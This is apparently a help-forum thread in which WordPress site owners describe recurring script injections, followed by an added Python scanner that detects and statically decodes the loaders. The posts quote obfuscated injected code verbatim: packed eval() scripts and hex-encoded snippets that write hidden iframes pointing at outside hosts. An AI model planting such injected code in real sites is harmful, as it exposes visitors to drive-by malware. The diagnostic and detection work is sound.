These are some screenshots while my website redirected to another site:
https://ibb.co/HD2BFhw
https://ibb.co/b2j4DMc
Thanks
https://drive.google.com/file/d/0BxeA28xMdEqIaWxZYU5ObFdqZkE/view?usp=sharing
I kept on removing the script from the header files, but I'm not able to get a permanent solution.
For reference, please check the source code of the other websites also … the same code is triggered on all websites, as you can see in the screenshot,
website :- www.airconelevators.com
oxygymfitness.in
Any help would be appreciated!
Thanks..!!
Anyway, this is a BIG problem and I don’t know how to fix it.
I’ve copied the injected code below. It appears in all the pages on my site, right below the <body …> tag. Interestingly it can only be seen by “inspecting element” in the browser; page source does not reveal it (I’ve added some line breaks to make it more readable, but this is exactly what shows up in my page).
This same problem occurs on every site where I upgrade to WP 4.3.1. I hope someone can fix this problem IMMEDIATELY!!
David McLeod
The injected code can be seen here: https://pastebin.com/ByME1EFt
<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|91||src|height|193|width|board||51|php|206|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>
It breaks the HTML/PHP and the site goes offline. I’ve already scanned the installation with Sucuri/Wordfence/Anti Malware and cleaned it a couple of times, but this issue comes back.
WordPress and all the plugins are up to date. I’m using WooCommerce and a couple of other plugins (google sitemap, thesis/themedy, contact form 7).
I’m not a programmer, and I’m out of ideas. Does anyone have any suggestions on how this could be repaired?
Thank you and best regards.
According to the Google webmaster tool this code was injected in my homepage and in another inner page:
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c
)]=k||e(c)}k=[function(e){return d[e]}];e=function(){retu
rn’\\w+’};c=1};while(c–){if(k){p=p.replace(new RegExp(‘\
\b’+e(c)+’\\b’,’g’),k)}}return p}(‘i 9(){a=6.h(\’b\’);7(!
a){5 0=6.j(\’k\’);6.g.l(0);0.n=\’b\’;0.4.d=\’8\’;0.4.c=\’8\’
;0.4.e=\’f\’;0.m=\’w://z.o.B/C.D?t=E\’}}5 2=A.x.q();7(((2.3(
“p”)!=-1&&2.3(“r”)==-1&&2.3(“s”)==-1))&&2.3(“v”)!=-1){5 t=u(
“9()”,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|M
akeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src
|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
|userAgent|1000|fgsdgsd|navigator|ai|showthread|php|72241732
‘.split(‘|’),0,{}))
</script>
All WordPress folders and files had and have 755 file permission.
Below are the scripts injected in the WordPress files. According to my hosting partner (one.com) someone got hold of my passwords, but I’ve seen that files have been injected after I changed the password to my site. I did not change the password to my wp-admin account last time since I didn’t suspect this to be a WordPress break-in, but now I don’t know anymore…
wp-includes\class-smtp.php
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
wp-includes\post.php
<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
wp-includes\query.php
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E706F726E67616C6C65726965737A2E636F6D2F73742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
wp-includes\feed-rss2-comments.php
<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
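Added example, not part of any of the posts above: a static check for the two loader shapes quoted in this thread, the eval(function(p,a,c,k,e,d) packer and the hex string written out through unescape, which also decodes the hex so the hidden markup can be read without running it. The function names, the sample file names and the example.invalid host are this example's own constructions.

```python
import re

# Signatures taken from the samples quoted in the posts above.
PACKER_RE = re.compile(r"eval\(function\(p,a,c,k,e,d\)")
# A long run of hex byte pairs assigned to a variable, as in the wp-includes samples.
HEX_VAR_RE = re.compile(r"var\s+\w+\s*=\s*'((?:[0-9A-Fa-f]{2}){20,})'")
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*src=[\"']?([^\"'\s>]+)", re.I)


def decode_hex_payload(hex_text):
    """Decode the hex string statically; nothing is executed or fetched."""
    return bytes.fromhex(hex_text).decode("latin-1")


def scan_text(name, text):
    """Return a list of (name, rule, detail) findings for one file's contents."""
    findings = []
    if PACKER_RE.search(text):
        findings.append((name, "packed-eval", "eval(function(p,a,c,k,e,d) packer"))
    for match in HEX_VAR_RE.finditer(text):
        decoded = decode_hex_payload(match.group(1))
        iframe = IFRAME_SRC_RE.search(decoded)
        detail = "iframe src=" + iframe.group(1) if iframe else "hex string, no iframe"
        findings.append((name, "hex-encoded-markup", detail))
    return findings


# Constructed sample input (not from a real site): one clean file and two files
# carrying the same loader shapes as the posts, pointing at a placeholder host.
_MARKUP = '<iframe src="http://example.invalid/static.php" height="2" style="display:none" width="2"></iframe>'
SAMPLE_FILES = {
    "wp-includes/clean.php": "<?php function ok() { return 1; }",
    "wp-includes/post.php": "<?php /* core code */ ?>\n<script> var s='"
    + _MARKUP.encode("latin-1").hex().upper()
    + "'; var o=''; document.write(unescape(o));</script>",
    "index.php": "<script>eval(function(p,a,c,k,e,d){return p}('x',1,1,''.split('|'),0,{}))</script>",
}


def scan_all(files):
    """Scan a {path: contents} mapping and return all findings, sorted by path."""
    results = []
    for name, text in sorted(files.items()):
        results.extend(scan_text(name, text))
    return results


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_FILES):
        print(*finding, sep="\t")
```

To use it on a real installation, build the mapping by reading the .php, .js and .html files under the site root; any hit inside wp-includes or wp-admin can then be compared against a fresh copy of the same WordPress release.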